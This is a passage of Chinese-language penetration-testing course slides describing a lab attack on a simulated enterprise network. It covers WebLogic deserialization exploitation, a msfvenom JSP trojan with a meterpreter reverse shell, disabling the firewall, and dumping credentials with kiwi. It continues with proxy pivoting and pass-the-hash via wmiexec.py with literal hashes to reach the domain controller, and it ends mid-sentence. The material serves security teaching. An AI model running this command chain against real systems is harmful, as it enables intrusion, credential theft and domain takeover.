滲透測試技術(shù)-教學(xué)課件 第八 章 滲透測試綜合實(shí)驗(yàn)二

第八章滲透測試綜合實(shí)驗(yàn)二目錄CONTENTS01實(shí)驗(yàn)概述02實(shí)驗(yàn)過程03實(shí)驗(yàn)總結(jié)實(shí)驗(yàn)概述PART.01實(shí)驗(yàn)概述本實(shí)驗(yàn)環(huán)境為模擬企業(yè)真實(shí)網(wǎng)絡(luò)環(huán)境搭建的漏洞靶場。實(shí)驗(yàn)過程分為兩個(gè)階段，首先，通過外網(wǎng)滲透Web服務(wù)器，獲取服務(wù)器控制權(quán)限。然后，入侵企業(yè)內(nèi)網(wǎng)，具體方法為先建立隧道進(jìn)行內(nèi)網(wǎng)滲透，再進(jìn)一步掃描內(nèi)網(wǎng)主機(jī)，并進(jìn)行漏洞利用，最終通過域滲透獲取域控制器及內(nèi)網(wǎng)主機(jī)權(quán)限。迂回滲透，入侵企業(yè)內(nèi)網(wǎng)并將其控制為僵尸網(wǎng)絡(luò)實(shí)驗(yàn)拓?fù)鋵?shí)驗(yàn)拓?fù)淇梢苑譃閮纱髤^(qū)域，分別是攻擊者區(qū)域和服務(wù)器區(qū)域。實(shí)驗(yàn)環(huán)境及實(shí)驗(yàn)工具1.實(shí)驗(yàn)環(huán)境（1）本實(shí)驗(yàn)的環(huán)境通過VMwareWorkstation15.5.6搭建，通過NAT模式及僅主機(jī)模式來模擬企業(yè)外網(wǎng)及內(nèi)網(wǎng)，具體網(wǎng)段分配如下：內(nèi)網(wǎng)網(wǎng)段：/24DMZ網(wǎng)段：/24（2）本實(shí)驗(yàn)共5臺實(shí)驗(yàn)機(jī)器，IP地址配置信息見書。本實(shí)驗(yàn)所有機(jī)器的登錄密碼均為Test@1234。實(shí)驗(yàn)環(huán)境及實(shí)驗(yàn)工具2.實(shí)驗(yàn)工具DirsearchWeblogicScanJava反序列化終極測試工具M(jìn)etasploitBehinder火狐瀏覽器實(shí)驗(yàn)過程PART.02實(shí)驗(yàn)過程——1.環(huán)境準(zhǔn)備知識回顧（1）配置基本網(wǎng)絡(luò)（2）開啟Web服務(wù)01配置網(wǎng)絡(luò)1.環(huán)境準(zhǔn)備——滲透步驟（1）在實(shí)驗(yàn)機(jī)器中，已經(jīng)完成了內(nèi)網(wǎng)IP地址的設(shè)置，因此只需要在VMwareworkstation

中選擇“編輯”→“虛擬網(wǎng)絡(luò)編輯器”命令，設(shè)置虛擬網(wǎng)絡(luò)（2）在“虛擬網(wǎng)絡(luò)編輯器”對話框中，將“VMnet1”的網(wǎng)段設(shè)置為內(nèi)網(wǎng)網(wǎng)段，（3）將“VMnet8”的網(wǎng)段設(shè)置為外網(wǎng)網(wǎng)段02查看網(wǎng)絡(luò)配置情況

（1）使用TEST\administrator用戶登錄DC主機(jī)，查看DC主機(jī)IP地址配置情況。（2）使用WEB\administrator用戶登錄WEB主機(jī)，查看WEB主機(jī)IP地址配置情況。（3）使用TEST\testuser001用戶登錄PC主機(jī)，查看PC主機(jī)IP地址配置情況。03開啟Web服務(wù)1.環(huán)境準(zhǔn)備——滲透步驟在實(shí)驗(yàn)開始之前，需要在WEB主機(jī)中開啟Web服務(wù)，以滿足后續(xù)步驟的需求。

進(jìn)入WEB主機(jī)的C:\Oracle\Middleware\user_projects\domains\base_domain目錄，以管理員身份運(yùn)行startWebLogic.cmd文件。03開啟Web服務(wù)1.環(huán)境準(zhǔn)備——滲透步驟運(yùn)行之后，在彈出的執(zhí)行窗口中可以看到如圖所示的內(nèi)容，說明Web服務(wù)運(yùn)行成功。注意：此窗口不能關(guān)閉，最小化即可。1.環(huán)境準(zhǔn)備——滲透結(jié)果進(jìn)入Kali攻擊機(jī)（賬號root，密碼Test@1234），打開瀏覽器，訪問Web服務(wù)地址，如果出現(xiàn)如圖所示界面，就說明Web環(huán)境配置成功。實(shí)驗(yàn)過程——2.信息收集知識回顧（1）使用Nmap探測系統(tǒng)指紋、開放端口的技巧（2）使用WeblogicScan探測漏洞01使用Nmap探測Web服務(wù)器系統(tǒng)指紋、開放端口等信息在Kali終端執(zhí)行命令“nmap-sV-O03”，探測Web服務(wù)器2.信息收集——滲透步驟猜測目標(biāo)系統(tǒng)可能為Windows7SP1或Windows8.1探測端口，執(zhí)行命令“nmap-Pn-A-T403”2.信息收集——滲透步驟Web服務(wù)器開放了很多常用端口，部分端口可能存在漏洞，請分析各端口可能存在的漏洞。02Web漏洞探測使用WeblogicScan掃描Web服務(wù)器。進(jìn)入/root目錄，查看WeblogicScan并將其解壓縮。2.信息收集——滲透步驟02Web漏洞探測進(jìn)入WeblogicScan目錄，執(zhí)行命令“python3WeblogicScan.py[IP][PORT]”，掃描Web服務(wù)器漏洞。2.信息收集——滲透步驟2.信息收集——滲透結(jié)果經(jīng)過掃描，發(fā)現(xiàn)目標(biāo)服務(wù)器的后臺地址，并且WeblogicScan會(huì)嘗試爆破登錄密碼，但是由于字典限制，爆破沒有成功。2.信息收集——滲透結(jié)果嘗試訪問掃描出來的后臺登錄地址，確認(rèn)后臺頁面真實(shí)存在且能夠正常訪問。訪問結(jié)果：發(fā)現(xiàn)存在Java反序列化漏洞：（1）CVE-2017-3506漏洞（2）CVE-2019-2725漏洞（3）CVE-2019-2729漏洞實(shí)驗(yàn)過程——3.漏洞利用獲取WebShell（1）冰蝎馬WebShell的獲取方法（2）MSF-WebShell的獲取方法（3）主機(jī)信息的收集方法（4）權(quán)限提升方法知識回顧01獲取WebShell方式一：上傳冰蝎馬獲取WebShell。方式二：上傳MSF木馬獲取WebShell。3.漏洞利用獲取WebShell——滲透步驟使用MSF的msfvenom模塊生成muma.jsp木馬文件，并保存到/var/www/html/目錄下01獲取WebShell方式二：上傳MSF木馬獲取WebShell。接下來需要將新生成的muma.jsp木馬文件通過Java反序列化終極測試工具進(jìn)行上傳，執(zhí)行命令“serviceapache2start”，啟動(dòng)Apache服務(wù)。

在Windows攻擊機(jī)上訪問Kali木馬地址。3.漏洞利用獲取WebShell——滲透步驟01獲取WebShell將木馬內(nèi)容復(fù)制到Java反序列化終極測試工具并上傳。3.漏洞利用獲取WebShell——滲透步驟01獲取WebShell在Kali監(jiān)聽反彈的Shell。此處監(jiān)聽反彈Shell的是exploit/multi/handler腳本，攻擊載荷為windows/meterpreter/reverse_tcp，此載荷作用是建立反向TCP監(jiān)聽，創(chuàng)建Meterpreter會(huì)話3.漏洞利用獲取WebShell——滲透步驟01獲取WebShell使用瀏覽器訪問上傳到Web服務(wù)器的木馬文件。如果頁面顯示為空，就說明代碼被成功執(zhí)行。3.漏洞利用獲取WebShell——滲透步驟02獲取主機(jī)信息在MeterpreterShell中，查看當(dāng)前Shell信息及用戶權(quán)限，執(zhí)行命令“shell”，進(jìn)入目標(biāo)主機(jī)的CMD窗口中。如果出現(xiàn)亂碼，就在CMD窗口中執(zhí)行命令“chcp65001”，解決亂碼問題。3.漏洞利用獲取WebShell——滲透步驟02獲取主機(jī)信息執(zhí)行命令“ipconfig/all”，查看網(wǎng)絡(luò)配置信息，如圖8-41所示，最終發(fā)現(xiàn)目標(biāo)主機(jī)存在內(nèi)網(wǎng)網(wǎng)段，猜測可能存在內(nèi)網(wǎng)，為下一步內(nèi)網(wǎng)滲透做準(zhǔn)備。3.漏洞利用獲取WebShell——滲透步驟02獲取主機(jī)信息執(zhí)行命令“systeminfo”，查看操作系統(tǒng)及版本信息，探測出操作系統(tǒng)版本為WindowsServer2008R2，與前面Nmap探測結(jié)果做比較，最終可以確認(rèn)目標(biāo)系統(tǒng)版本。3.漏洞利用獲取WebShell——滲透步驟執(zhí)行命令“wmicservicelistbrief”，查看系統(tǒng)服務(wù)安裝及運(yùn)行情況。3.漏洞利用獲取WebShell——滲透步驟執(zhí)行命令“wmicstartupgetcommand，caption”，查看啟動(dòng)程序信息，發(fā)現(xiàn)目標(biāo)主機(jī)并未安裝和運(yùn)行安全防護(hù)軟件。3.漏洞利用獲取WebShell——滲透步驟執(zhí)行命令“netshadvfirewallshowallprofiles”，查看防火墻狀態(tài)，最終可以看到防火墻為開啟狀態(tài)。3.漏洞利用獲取WebShell——滲透步驟執(zhí)行命令“systeminfo”，查看系統(tǒng)補(bǔ)丁信息。如果存在未安裝補(bǔ)丁的漏洞，就可以直接對漏洞進(jìn)行利用。3.漏洞利用獲取WebShell——滲透步驟系統(tǒng)補(bǔ)丁信息如圖所示，可以看到目標(biāo)主機(jī)安裝了3個(gè)補(bǔ)丁，說明與補(bǔ)丁編號對應(yīng)的漏洞已經(jīng)被修復(fù)。3.漏洞利用獲取WebShell——滲透步驟03提升權(quán)限回到MeterpreterShell，執(zhí)行命令“ps”，查看進(jìn)程。3.漏洞利用獲取WebShell——滲透步驟03提升權(quán)限執(zhí)行命令“getpid”，查看當(dāng)前Shell的進(jìn)程號。當(dāng)前Shell的進(jìn)程號如圖所示，可以看到這個(gè)進(jìn)程很容易被發(fā)現(xiàn)，需要進(jìn)一步隱藏。3.漏洞利用獲取WebShell——滲透步驟03提升權(quán)限將進(jìn)程遷移到System權(quán)限的進(jìn)程services.exe執(zhí)行命令“migrate468”，遷移進(jìn)程。3.漏洞利用獲取WebShell——滲透步驟03提升權(quán)限遷移進(jìn)程后直接變成System權(quán)限。執(zhí)行命令“netshadvfirewallsetallprofilesstateoff”，關(guān)閉防火墻。3.漏洞利用獲取WebShell——滲透步驟03提升權(quán)限由于在前面獲取的信息中，確定目標(biāo)主機(jī)操作系統(tǒng)版本低于WindowsServer2012，且未安裝KB2871997補(bǔ)丁，因此可以利用Mimikatz工具獲取明文密碼。在MeterpreterShell中加載Mimikatz，在新版MSF中，Mimikatz已經(jīng)被kiwi替代。

執(zhí)行命令“l(fā)oadkiwi”，加載kiwi。3.漏洞利用獲取WebShell——滲透步驟通過上傳MSF木馬成功獲取WebShell，并通過提權(quán)成功獲取域賬號和密碼等信息。執(zhí)行命令“creds_wdigest”，獲取域內(nèi)賬號明文信息。3.漏洞利用獲取WebShell——滲透結(jié)果實(shí)驗(yàn)過程——4.內(nèi)網(wǎng)滲透（1）域內(nèi)信息的收集方法（2）內(nèi)網(wǎng)流量的代理方法（3）域內(nèi)主機(jī)權(quán)限的獲取方法（4）域控制器權(quán)限獲取方法知識回顧01WEB主機(jī)內(nèi)網(wǎng)信息收集在前面步驟中，已經(jīng)得知Web服務(wù)器存在一個(gè)內(nèi)網(wǎng)網(wǎng)段。在CMD窗口中，繼續(xù)收集域內(nèi)信息。執(zhí)行命令“netconfigworkstation”，查看當(dāng)前計(jì)算機(jī)名、用戶名、系統(tǒng)版本、工作站域、登錄的域等。如果報(bào)錯(cuò)，就執(zhí)行命令“ipconfig/all”。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集執(zhí)行命令“netuser/domain”，查看域內(nèi)用戶。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集執(zhí)行命令“netgroup/domain”，查看域用戶組列表。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集執(zhí)行命令“netgroup”domaincomputers“/domain”，查看域內(nèi)所有主機(jī)。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集執(zhí)行命令“netgroup"domaincontrollers"/domain”，查看域控制器。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集執(zhí)行命令“netgroup”EnterpriseAdmins“/domain”，查看域管理員，可以看到域管理員為Administrator。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集利用auxiliary/scanner/smb/smb_version模塊探測內(nèi)網(wǎng)存活主機(jī)。4.內(nèi)網(wǎng)滲透——滲透步驟01WEB主機(jī)內(nèi)網(wǎng)信息收集由于未進(jìn)行內(nèi)網(wǎng)漫游，因此最終只能得到Web服務(wù)器的內(nèi)網(wǎng)IP地址、操作系統(tǒng)版本及主機(jī)名等信息。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）回到MeterpreterShell，執(zhí)行命令“runpost/windows/gather/enum_domain”，查看域控制器IP地址。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）執(zhí)行命令“runpost/multi/manage/autoroute”，添加內(nèi)網(wǎng)路由。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）執(zhí)行命令“runautoroute-p”，查看路由配置情況。在路由表中，能夠看到網(wǎng)段，說明路由配置成功，接下來即可進(jìn)行內(nèi)網(wǎng)漫游。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）但內(nèi)網(wǎng)無法直接進(jìn)行漫游，需要通過代理實(shí)現(xiàn)內(nèi)網(wǎng)穿透。執(zhí)行命令“background”，掛起當(dāng)前會(huì)話。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）通過auxiliary/server/socks_proxy模塊建立反向代理。4.內(nèi)網(wǎng)滲透——滲透步驟02建立域內(nèi)連接（內(nèi)網(wǎng)穿透）修改/etc/proxychains4.conf代理配置文件，在最后一行將IP地址修改為，端口修改為1080。4.內(nèi)網(wǎng)滲透——滲透步驟03其他主機(jī)內(nèi)網(wǎng)信息收集在MeterpreterShell執(zhí)行命令“runpost/windows/gather/arp_scannerRHOSTS=/24”，探測域內(nèi)存活主機(jī)。4.內(nèi)網(wǎng)滲透——滲透步驟根據(jù)探測結(jié)果，還有一臺IP地址為01的主機(jī)是未知狀態(tài)。03其他主機(jī)內(nèi)網(wǎng)信息收集使用auxiliary/scanner/smb/smb_version模塊探測未知主機(jī)。4.內(nèi)網(wǎng)滲透——滲透步驟探測成功，得到目標(biāo)主機(jī)為Windows7SP1操作系統(tǒng)。04獲取域內(nèi)主機(jī)權(quán)限使用Nmap，執(zhí)行命令“proxychains4nmap-Pn-sF01”，探測防火墻。4.內(nèi)網(wǎng)滲透——滲透步驟04獲取域內(nèi)主機(jī)權(quán)限執(zhí)行命令“proxychains4nmap-Pn-sS-T4-sV-p21,22,53,80,135,445,1433,3389,808001”，探測端口和服務(wù)。4.內(nèi)網(wǎng)滲透——滲透步驟04獲取域內(nèi)主機(jī)權(quán)限使用auxiliary/scanner/smb/smb_ms17_010模塊驗(yàn)證是否存在MS17-010漏洞。4.內(nèi)網(wǎng)滲透——滲透步驟04獲取域內(nèi)主機(jī)權(quán)限確認(rèn)存在漏洞后，使用psexec模塊利用漏洞。4.內(nèi)網(wǎng)滲透——滲透步驟04獲取域內(nèi)主機(jī)權(quán)限執(zhí)行命令“exploit”，沒有返回監(jiān)聽，說明漏洞利用失敗。4.內(nèi)網(wǎng)滲透——滲透步驟因?yàn)榍懊嬉呀?jīng)通過kiwi獲取了域管理員賬號的哈希值，所以此時(shí)可使用wmiexec.py利用漏洞。04獲取域內(nèi)主機(jī)權(quán)限執(zhí)行命令“proxychains4/root/wmiexec.py-hashes00000000000000000000000000000000:b6e259e4e96f44d98ab6eeaa3b328ed7Administrator@01”，發(fā)現(xiàn)漏洞最終還是利用失敗。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限使用Nmap，執(zhí)行命令“proxychains4nmap-Pn-sS-T4-sV-p21,22,53,80,135,445,1433,3389,80800”，探測域控制器的端口和服務(wù)。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限域控制器開放的端口如圖所示，發(fā)現(xiàn)域控制器同樣開放了445端口。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限嘗試使用wmicexec.py利用漏洞。先執(zhí)行命令“creds_all”，列舉所有憑據(jù)。4.內(nèi)網(wǎng)滲透——滲透步驟發(fā)現(xiàn)沒有Domain為TEST的Administrator用戶，需要切換到WEB主機(jī)。05獲取域控制器權(quán)限使用TEST\Administrator用戶登錄WEB主機(jī)。

登錄成功之后，再次執(zhí)行命令“creds_all”，列舉所有憑據(jù)。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限執(zhí)行命令“proxychains4/root/wmiexec.py-hashes00000000000000000000000000000000:a803cf45d87009c404eb89df4b1ae94cAdministrator@0”，獲取域控制器的管理員權(quán)限。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限查看域控制器是否開啟防火墻。4.內(nèi)網(wǎng)滲透——滲透步驟由于亂碼問題，無法確定防火墻是否開啟。05獲取域控制器權(quán)限使用exploit/windows/smb/psexec模塊，獲取Shell。4.內(nèi)網(wǎng)滲透——滲透步驟05獲取域控制器權(quán)限成功獲取反彈的Shell，并獲取Sy